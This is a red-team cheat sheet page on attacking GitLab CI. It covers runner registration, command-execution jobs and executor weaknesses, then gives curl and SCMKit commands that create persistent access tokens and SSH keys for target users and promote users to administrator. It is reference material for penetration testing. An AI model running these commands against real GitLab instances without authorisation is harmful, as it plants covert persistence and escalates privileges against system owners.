daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cicd-gitlab-ci.md (5230B)


      1 ---
      2 title: "CI/CD - Gitlab CI"
      3 section: "DevOps"
      4 sectionSlug: "devops"
      5 sourcePath: "docs/devops/cicd-gitlab-ci.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/devops/cicd-gitlab-ci.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # CI/CD - Gitlab CI
     12 
     13 GitLab CI (Continuous Integration) is a built-in feature of GitLab that automates the process of building, testing, and deploying your code every time you make a change. It's part of GitLab CI/CD, which stands for Continuous Integration / Continuous Deployment.
     14 
     15 ## Gitlab Runners
     16 
     17 ```ps1
     18 sudo apt-get install gitlab-runner
     19 sudo gitlab-runner register
     20 ```
     21 
     22 | Prompt              | Example Input                                            |
     23 | ------------------- | -------------------------------------------------------- |
     24 | GitLab instance URL | `https://gitlab.com/`                                    |
     25 | Registration token  | Found in your project under `Settings > CI/CD > Runners` |
     26 | Executor            | `shell`, `docker`, etc.                                  |
     27 | Description         | `my-remote-runner`                                       |
     28 | Tags                | `remote`                                                 |
     29 
     30 The `.gitlab-ci.yml` file is the configuration file that GitLab CI/CD uses to define your pipelines, jobs, and stages.
     31 
     32 ### Command Execution Jobs
     33 
     34 Gitlab-CI "Command Execution" example: `.gitlab-ci.yml`
     35 
     36 ```yaml
     37 stages:
     38     - test
     39 
     40 test:
     41     stage: test
     42     script:
     43         - |
     44             whoami
     45     parallel:
     46         matrix:
     47             - RUNNER: VM1
     48             - RUNNER: VM2
     49             - RUNNER: VM3
     50     tags:
     51         - ${RUNNER}
     52 ```
     53 
     54 ### List GitLab Runners
     55 
     56 List all GitLab runners available to the current user in GitLab.
     57 
     58 ```ps1
     59 SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local
     60 SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local
     61 ```
     62 
     63 ## Gitlab Executors
     64 
     65 * **Shell** executor: The jobs are run with the permissions of the GitLab Runner’s user and can steal code from other projects that are run on this server.
     66 * **Docker** executor: Docker can be considered safe when running in non-privileged mode.
     67 * **SSH** executor: SSH executors are susceptible to MITM attack (man-in-the-middle), because of missing `StrictHostKeyChecking` option.
     68 
     69 ## Gitlab CI/CD Variables
     70 
     71 CI/CD Variables are a convenient way to store and use data in a CI/CD pipeline, but variables are less secure than secrets management providers.
     72 
     73 ## Persistence
     74 
     75 * [xforcered/SCMKit](https://github.com/xforcered/SCMKit) - Source Code Management Attack Toolkit
     76 
     77 ### Personal Access Token
     78 
     79 Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance.
     80 
     81 * Manual
     82 
     83     ```ps1
     84     curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens"
     85     ```
     86 
     87 * Using `SCMKit.exe`: Create/List/Delete an access token to be used in a particular SCM system
     88 
     89     ```ps1
     90     SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName
     91     SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName
     92     SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID
     93     SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser
     94     SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser
     95     ```
     96 
     97 * Get the assigned privileges to an access token being used in a particular SCM system
     98 
     99     ```ps1
    100     SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local
    101     ```
    102 
    103 ### SSH Keys
    104 
    105 * Create/List an SSH key to be used in a particular SCM system
    106 
    107     ```ps1
    108     SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"
    109     SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"
    110     SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local
    111     SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local
    112     SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID
    113     SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID
    114     ```
    115 
    116 ### User Promotion
    117 
    118 * Promote a normal user to an administrative role in a particular SCM system
    119 
    120     ```ps1
    121     SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName
    122     SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName
    123     SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName
    124     ```
    125 
    126 ## Tools
    127 
    128 * [praetorian-inc/glato](https://github.com/praetorian-inc/glato) - GitLab Attack TOolkit
    129 
    130 ## References
    131 
    132 * [Security for self-managed runners - Gitlab](https://docs.gitlab.com/runner/security/)